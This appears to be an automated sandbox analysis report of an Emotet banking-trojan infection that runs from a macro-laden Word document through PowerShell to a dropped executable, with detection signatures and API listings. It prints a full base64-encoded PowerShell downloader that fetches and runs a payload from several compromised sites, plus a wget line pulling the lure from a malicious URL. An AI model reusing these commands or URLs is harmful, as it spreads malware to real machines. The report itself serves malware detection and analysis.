Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://powerlift.acompli.net
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://settings.outlook.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://tasks.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: wget.exe, 00000002.00000002.4302724913.0000000001060000.00000004.00000040.sdmp, cmdline.out.2.drString found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k
Source: cmdline.out.2.drString found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k/
Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmpString found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k/g
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://wus2-000.contentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://www.odwebp.svc.ms
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\546.exeCode function: 11_2_0043A3BA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_0043A3BA
Source: C:\Users\user\546.exeCode function: 11_2_0044C952 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,11_2_0044C952
Source: C:\Users\user\546.exeCode function: 11_2_0043EDC2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,11_2_0043EDC2
Source: C:\Users\user\546.exeCode function: 11_2_00451462 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,11_2_00451462
Source: C:\Users\user\546.exeCode function: 12_2_0043A3BA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,12_2_0043A3BA
Source: C:\Users\user\546.exeCode function: 12_2_0044C952 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,12_2_0044C952
Source: C:\Users\user\546.exeCode function: 12_2_0043EDC2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,12_2_0043EDC2
Source: C:\Users\user\546.exeCode function: 12_2_00451462 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,12_2_00451462
Source: C:\Users\user\546.exeCode function: 12_2_00453D18 GetKeyState,GetKeyState,GetKeyState,12_2_00453D18
Source: C:\Users\user\546.exeCode function: 12_2_00433F06 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,12_2_00433F06

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8CCBC14_2_00F8CCBC
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgAcwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
Yara detected EmotetShow sources
Source: Yara matchFile source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,14_2_00F81F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.4392999484.0000000002101000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000C.00000002.4444003795.00000000022B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\546.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2181
Contains functionality to delete servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8CE88 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,14_2_00F8CE88
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81D2B CreateProcessAsUserW,CreateProcessW,14_2_00F81D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\546.exeCode function: 11_2_0041AAF211_2_0041AAF2
Source: C:\Users\user\546.exeCode function: 12_2_0041AAF212_2_0041AAF2
Source: C:\Users\user\546.exeCode function: 12_2_0041F7B412_2_0041F7B4
Source: C:\Users\user\546.exeCode function: 12_2_0042583512_2_00425835
Source: C:\Users\user\546.exeCode function: 12_2_0043BA2E12_2_0043BA2E
Source: C:\Users\user\546.exeCode function: 12_2_0042DC9F12_2_0042DC9F
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E030E413_2_00E030E4
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E030E813_2_00E030E8
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E028C113_2_00E028C1
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E237A513_2_00E237A5
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E237A913_2_00E237A9
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E22F8213_2_00E22F82
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F630E414_2_00F630E4
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F630E814_2_00F630E8
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F628C114_2_00F628C1
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F837A914_2_00F837A9
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F837A514_2_00F837A5
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F82F8214_2_00F82F82
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: O_45870184.rtf.2.drOLE, VBA macro line: Private Sub Document_open()
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\546.exeCode function: String function: 004204C4 appears 121 times
Source: C:\Users\user\546.exeCode function: String function: 00402320 appears 43 times
Source: C:\Users\user\546.exeCode function: String function: 0043D095 appears 71 times
Source: C:\Users\user\546.exeCode function: String function: 0041FBF8 appears 554 times
Source: C:\Users\user\546.exeCode function: String function: 00401330 appears 40 times
Source: C:\Users\user\546.exeCode function: String function: 00425076 appears 53 times
Source: C:\Users\user\546.exeCode function: String function: 00439D44 appears 77 times
Source: C:\Users\user\546.exeCode function: String function: 00422CD7 appears 76 times
Source: C:\Users\user\546.exeCode function: String function: 0045634D appears 39 times
Source: C:\Users\user\546.exeCode function: String function: 004550E6 appears 81 times
Source: C:\Users\user\546.exeCode function: String function: 0043CF2E appears 79 times
PE file contains strange resourcesShow sources
Source: 546.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 546.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 546.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature matchShow sources
Source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.4392999484.0000000002101000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000C.00000002.4444003795.00000000022B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: C:\Users\user\Documents\20200204\PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.win@13/22@3/5
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00446D7C __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,11_2_00446D7C
Contains functionality to create servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,14_2_00F8CF58
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E21943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00E21943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\546.exeCode function: 11_2_0045E063 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,11_2_0045E063
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\546.exeCode function: 11_2_0043E6C6 __EH_prolog,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,11_2_0043E6C6
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8CF58 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,14_2_00F8CF58
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
Source: C:\Users\user\546.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MAEB3A448
Source: C:\Users\user\546.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IAEB3A448
Source: C:\Windows\SysWOW64\driverthunk.exeMutant created: \BaseNamedObjects\Global\IAEB3A448
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E566382D-E9C7-4F1B-AA33-A7B4D991C2B8} - OProcSessId.datJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k' > cmdline.out 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\O_45870184.rtf.docm' /o ''
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgAcwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\546.exe C:\Users\user\546.exe
Source: unknownProcess created: C:\Users\user\546.exe --b0e232c2
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe C:\Windows\SysWOW64\driverthunk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0c
